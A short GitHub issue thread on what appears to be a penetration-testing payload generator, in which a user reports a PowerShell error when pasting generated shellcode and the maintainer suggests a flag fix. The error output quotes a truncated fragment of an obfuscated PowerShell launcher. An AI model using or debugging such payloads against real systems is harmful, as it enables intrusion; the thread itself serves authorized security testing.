### ISSUE TITLE
PowerShell attack issue

### ISSUE THREAD

**Issue by Exotic-Algorithms** [trustedsec/unicorn#71]
when i copy and paste the shell code into the power shell it gives me this error:

/w : The term '/w' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the
spelling of the name, or if a path was included, verify that the path is correct and try again.
At line:1 char:2
+  /w 1 /C "s''v Wi -;s''v Lm e''c;s''v Ly ((g''v Wi).value.toString()+ ...
+  ~~
    + CategoryInfo          : ObjectNotFound: (/w:String) [], CommandNotFoundException
    + FullyQualifiedErrorId : CommandNotFoundException

**Comment by trustedsec** [comment]
Sounds like a super old version of PowerShell - you can use -w 1 instead.
